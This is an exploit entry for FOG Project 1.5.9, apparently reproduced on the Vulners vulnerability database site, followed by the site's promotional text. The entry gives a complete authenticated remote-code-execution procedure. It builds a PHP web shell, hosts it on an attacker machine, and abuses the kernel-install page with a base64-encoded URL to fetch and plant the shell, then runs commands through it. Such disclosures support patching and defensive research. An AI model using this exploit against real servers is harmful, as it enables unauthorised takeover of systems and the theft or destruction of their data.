Vulners
Lucene search
FOGProject 1.5.9 - File Upload RCE (Authenticated)
# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated)
# Date: 2021-04-28
# Exploit Author: [email protected]
# Vendor Homepage: https://fogproject.org
# Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip
# Tested on: Debian 10
On the Attacker Machine:
1) Create an empty 10Mb file.
dd if=/dev/zero of=myshell bs=10485760 count=1
2) Add your PHP code to the end of the file created in the step 1.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell
3) Put the file "myshell" accessible through HTTP.
$ cp myshell /var/www/html
4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).
$ echo "http://ATTACKER_IP/myshell" | base64
aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=
5) Visit
http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64
Example:
http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64
6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php
and click on Install.
7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostnameData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Apr 2021 00:00Current
7.4High risk
Vulners AI Score7.4